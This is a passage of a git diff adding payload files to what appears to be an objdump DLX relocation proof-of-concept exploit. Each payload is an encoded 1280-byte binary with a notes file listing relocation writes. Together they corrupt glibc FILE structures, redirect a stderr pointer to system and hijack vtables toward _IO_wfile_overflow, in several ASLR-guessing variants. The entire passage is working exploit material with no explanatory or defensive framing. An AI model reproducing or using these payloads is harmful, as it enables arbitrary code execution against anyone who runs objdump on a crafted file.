sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..79841f5254e06ac6ccb17b71a461a7cd0c1dff2a GIT binary patch literal 1280 zcmd5*O-mb56g`ufn8a$eMs3pyEm%+p#J)-VC@M;e?V>^i7fKcUz*q&VkQYHw(4XL5 zx2{TmK)dR)KS5~M;RE;bMKkUoj3QL%*?*CQWj#fK3+0TB!g0v(DOeueg9O|Zy)!6Yv|t_`VZuC zuF-i`8H+`HKA3juJobKrOxI3D>Z5d4U{%&>-(Qpws$x8P^#B}CBRNz=LN i{tU94#gG%k>^VM`{4jV#GnJ)yo43C(p1kG3?Ee6;oP5y$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes new file mode 100644 index 0000000..8ba2cee --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..9eb3932557300f35031e7edbac0dd2f2c7907019 GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&dLYMAcjOWf*#zz-jdf~lu&%I|Z_r1CA$I{znD`g=zYwd)7B4GdZ za})kPhBVq^?Y(kRvw)oeQgeWl@x1eOpiOuaXcs&N(h}bQI>;Y<05XEBK&N1tOYkGm zMYO*GS;6nXL;3Cy=(fqPfSkmC13eP|3G_1V%mR7FojKqU;}^W0K8ZJheu*Cg0}`JG z9;bq<8w>zLAwCK5-@syt|H2M{;824Hu57ze)Rg8v>W$dF!bYwzEoTMlRV#)q33_NbN*K=e)+imqM?6n=--gb zy+-%BLSHQ6?*kfh&XI3HUcZ1=&@OZddII_-^d$5Y^fdGgQ<7$0QJ|<$lqhNxMT#m# znWE06&XqdUxzxFQf5k@ipn>96wX*+tedo)k8jAJm?j5eb?lm?mDC$N%!0pfrd;A}e z8Iu*gb9wnPQ;|h}nt|jza;|X{i4wUyea=4?xWxEg{3Uh#dnR^p$y^8z&0;O FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..b534929662d3c4c5c6dda4d3ebe94454face8cea GIT binary patch literal 1280 zcmd5*O-mb56g`s}jj^UiQ?=TH1q%v+*f+6$pi)7!ixw<&Q85KIm{vg>$ctcUq5cH- zaqCL_0lIS8pHQ&t(xrPBUU=`^bMKkUeQ)mjvGjJ?N?C}_T05bi2-tu9 z+=Rc6A&vG}d#{|-EMRAV)EwYsJnwuRXcOK9+69k+w8S@n4)O;dfQ;ZO&?#8v68s2s z5$$h4R`5IUP`*0^x^40+ASdzPK##l%$zg6eubbC5jqFk)ldb zrl@nNbEOV-E_E*7U$Id=XrQ=Nt?YkZ-}&;XhGMt`a69zE9{&eq z#$-kBTwcD+RAiB#W*|9_oNF9KqC_rFpYx9eE-}6re@Pwxo{1e?G8e)_vslZzBx&Q~ isQW$0Y!*UJ5VPNLEBkJ+MLm@y*^1kz^ygbV==~P?ynWFC literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes new file mode 100644 index 0000000..97f797a --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..714a463865c3134cc42422f05897ae91321afddb GIT binary patch literal 1280 zcmd5*O-md>5Ph>Vx*ula$C^#lfPn}JEUfnI8Wjx*i1Cnsf(IolXe65`_=UZKVj%tm z?|Stl{(yM$n4b_ZSHWZM9>!PmwPTY*jw$GV^{U zSM~RoNTW5@{#QRIwbxZ=#=RJfhPTaEE@9r}1mxJdw{C`n;jXE z=zEO(QzPGRtwaqVEDDTwQ?{U4q(fG82vTp1IxEgw4kN*NP zW3r-mE-znZDzeB=GmxA|&NYrAQ6g8M&-uq&E-}6re@Pwxo{1SQnG4~eS*&GUlC*Gf i)cqc0HcKHVh}pB;YQ7t6QBM^~Hskgg{nt$%^nM5VzJ1XE literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes new file mode 100644 index 0000000..1a1b38c --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x05 +buf_delta=0xf020ff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xf020ff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..5a4487645ca42b4c0a02c00574d47d3b8dc92022 GIT binary patch literal 1280 zcmd5*O)n%-6g|~dwDwIK--!sxNF;4uHG?1{1Pc-p3xdQD?ISTG@p=+MGV>E=&vsVg z2e7jA6C|uBc7A|GIk!H#%Zr7jo7_70oO|l!)vNn{Pt8qR2@8d=R{pV$3HGDk>-V2M zNTRgh{ZK_>1h7*;Via&vo_Dnlln6fqN(Ik>r0Cy)GV+QgASJjAlnbsh1=oN|qJ08X z37!Jg^4=ey#wNc9YDIql>O{W<>Zv;;K$^NU3N%o^=IMMA{S0Un{Tyf#eF$hy1V`5r z09r$A3-N8>VzK|i9q^;*wBUIj(Wwu(!#d8Bxa+=*^~()^mEo@?e~$UnhQHD9w;26) zqu*ilyNv$lr%o!x{r4LFKEt0qnD`&}4;p^{hgaYKZC*~Jxc;Q!pE3Ni-gtPEMv-C2oJ;JTGkCo36rDl??Gm> dH{=8fdx4KtzYHGHp0d&`>h=Zeu_6!l{sK7nd(r>^ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes new file mode 100644 index 0000000..77ffde1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..c3bd2df1c4c09739d4983471647c1456ff0066c2 GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?p;dh3@9of7bX`Z;fBSoC9HMD!Ejq38?1 zXd<|}YycPwaXiG^fs4id3wOXn(P_c+JfbrcaEE!EC-L|3X{_FD`1=fhn*2KE&lvs@ z!=E+k6GnZ~s6R65Pp+n@wDvz^_-74&ey@BPKi|CJ=YMEB|BH&aTkDq%|El4CNiO#q z-DiclM8sbQw8_~=egt*>6k0*M(0S+r^c?gv=y~V`=tY*K%(|jM(V=Kj^eCDXU5YkE zpG%)B>(J-Y=kopK8nuH4a@)17{g2h%FCX@htJglYasBmk=UcU5H6j7d}5bsC!HI5=vtd?QU{>KuB1mBB4WF7yWiCrAh7sA7^xR&*sq=SR4 i?(ac*b0*{j344vxhMxvgw5PljTe|&=`STVJ_I?9@&3w@S literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes new file mode 100644 index 0000000..b4830e1 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d255eda80ebcaa47c8b95eb314b5da20d1a0aa2f GIT binary patch literal 1280 zcmd5*O-oxr6g@BRX^fxIRBKcaX`zA;J1?;+NvROjMGFzSsMJENm{y^!kcnVv!TtpI zy6vj?19a78e?pAhD;q6pY2AW;IGl;@pQfezuvK&RjdkQ99r=pyfV1Ed7kfo{PK4#9Uo zFVX%6^a*|k`sKSHz<^Eu4@irC0St=%2Na91rn!;9{}=!X5BXbXxE{kLU~q++iN)N&J0$8mo63{yxK>CclpPGlqY} z@Mn$sgi)U~>W_^2ldCBzt^Lm!{#nDH-z#6n&o^)Q`5)TO|Dq!9*7{|`ziRkjlFPkD z_gP^s5%JdnZF2UJA3a|a8Tz~!Cc)x|5Zqx(Z3A1pIcLC`! z8PPkJmoGgPMU*Eg#QTwbjibmEt7Vw8|FOg&!S~`1S;xO;Vi$+>h43&eu4Vlu>EK|i i`+JbyoC!HW!d~OF;ithA?I|zCmTv!I{=CJ5z25+W7kttH literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes new file mode 100644 index 0000000..b97fe85 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..5cea9885154c7f6912971e78c1ca9a357ed45c4b GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+A~I@&P0td5Q2h&Fj_sMPSB8mL>CDd$RgqhK5%@1nlLqjLBV`N z_Rcn|kPpz6OFuzKwt~BSKo*^I`!UlNS-A8<)w$=~(?wPFt&=zJ=B$*3Mp#SVnI{DM zCa4vIc?2$68{T`Bq^1Eo1EgjEC*%8PD?p3zQ=nC_4!EMP0%`IGAAyYEBG4vS<`7&4 z+KKiN&>?sXJe2Rg0-ZMbFQ7~G-$1wMmq3=fGY#aZJ2Su|>gT+j9??&MUeW77pXepv zaVosJ{t)ma!hs0?4_qwqU$_GvicSl@?-QMD$Q|ZM?&50bXQJL__&W@L7x~|WKWF%R z4S&B;e`?g98TCPv3oW?Lilyi_jC$lh9MpCFmC{Ntty;gQ7#xqUcdHDY_JG ziaw7%Pu8K&qtD~}%hxK0HRLxc>jzsaJNuiTkgryDZ*l!)ueP?1yslM4+>Wwnk9Ps- zF&XhYmzOU+6-S)A6q5bOzQ(uMl&IyHv;Xm$LxS%m7_v@q&%`u`^o8&!EUsl;khE~H j)q_1qZ;nQsAYs4fR1VT`iuY8IVpF$&Fn`(P;okoNf*E|$ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes new file mode 100644 index 0000000..8f41d5d --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=orig +flag_byte4=0x06 +buf_delta=0xef210000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 + +000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x46a1 sym=0x00d824ad stage write bytes at -0x46a0 +003 target=0x29b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x29c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x46a0 sym=0x000000fb finish write bytes at -0x46a0 +006 target=0xb57 sym=0x00ffffff stage write bytes at 0xb58 +007 target=0xb58 sym=0x000000ff finish write bytes at 0xb58 +008 target=0xb5b sym=0x00ffffff stage write bytes at 0xb5c +009 target=0xb5c sym=0x000000ff finish write bytes at 0xb5c +010 target=0x37b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x37c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x4680 sym=0xef210000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x3db sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x3dc sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x4638 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x43b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x43c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x4600 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x49b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x49c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x45c8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
